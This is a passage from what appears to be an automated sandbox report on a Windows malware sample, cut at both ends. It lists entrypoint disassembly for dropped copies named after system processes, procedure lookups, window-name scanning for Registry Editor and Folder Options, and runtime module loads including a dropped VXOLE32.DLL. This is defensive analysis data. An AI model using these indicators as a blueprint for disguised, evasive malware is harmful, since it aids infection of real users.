instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67E3D138.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67E3CC79.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"WINLOGON.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e206a@ADVAPI32.dll\"\n \"0e000f00703f206a@ADVAPI32.dll\"\n \"0e000f00cc3f206a@ADVAPI32.dll\"\n \"11001200b447206a@ADVAPI32.dll\"\n \"110012004848206a@ADVAPI32.dll\"\n \"120013008c48206a@ADVAPI32.dll\"\n \"12001300e448206a@ADVAPI32.dll\"\n \"14001500dc6f206a@ADVAPI32.dll\"\n \"14001500f46f206a@ADVAPI32.dll\"\n \"140015000c70206a@ADVAPI32.dll\"\n \"170018002470206a@ADVAPI32.dll\"\n \"0d000e003c70206a@ADVAPI32.dll\"\n \"110012004c70206a@ADVAPI32.dll\"\n \"110012006070206a@ADVAPI32.dll\"\n \"0f001000a071206a@ADVAPI32.dll\"\n \"14001500e071206a@ADVAPI32.dll\"\n \"14001500f871206a@ADVAPI32.dll\"\n \"0c000d004072206a@ADVAPI32.dll\"\n \"0c000d005072206a@ADVAPI32.dll\"\n \"0e000f006072206a@ADVAPI32.dll\"\n \"0e000f007072206a@ADVAPI32.dll\"\n \"0b000c008072206a@ADVAPI32.dll\"\n \"18001900b874206a@RPCRT4.dll\"\n \"13001400e474206a@RPCRT4.dll\"\n \"14001500f874206a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"RegEdit_RegEdit\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for window \"Registry Editor\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for window \"Folder Options\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for window \"Local Settings\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"ExploreWClass\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"CabinetWClass\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"RebarWindow32\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"ComboBoxEx32\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"ComboBox\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"Edit\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"KERNEL32\" at base 76230000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"DWMAPI.DLL\" at base 73f60000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"SHELL32.DLL\" at base 75510000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"OLE32.DLL\" at base 77140000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"USER32\" at base 76760000\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 76230000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 75510000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 77140000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"D3_08.exe\" loaded module \"USER32\" at base 76760000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76230000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f80000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 750b0000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74bb0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74940000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 73f60000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 75510000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 77140000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76760000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f80000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 750b0000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 74bb0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74940000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 73f60000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 75510000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76760000\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76230000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 750b0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74bb0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74940000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 750b0000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74bb0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74940000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73f60000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 75510000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76760000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76230000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f80000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76230000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74bb0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74940000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 75510000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76760000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 750b0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f80000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76230000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f80000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 750b0000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74bb0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74940000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 75510000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76760000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f80000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76190000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 750b0000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74bb0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74940000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76830000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 750a0000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73f60000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76230000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 75510000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74070000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76230000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f20000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 763e0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76d80000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ce0000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74610000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76760000\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76230000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75050000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71830000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 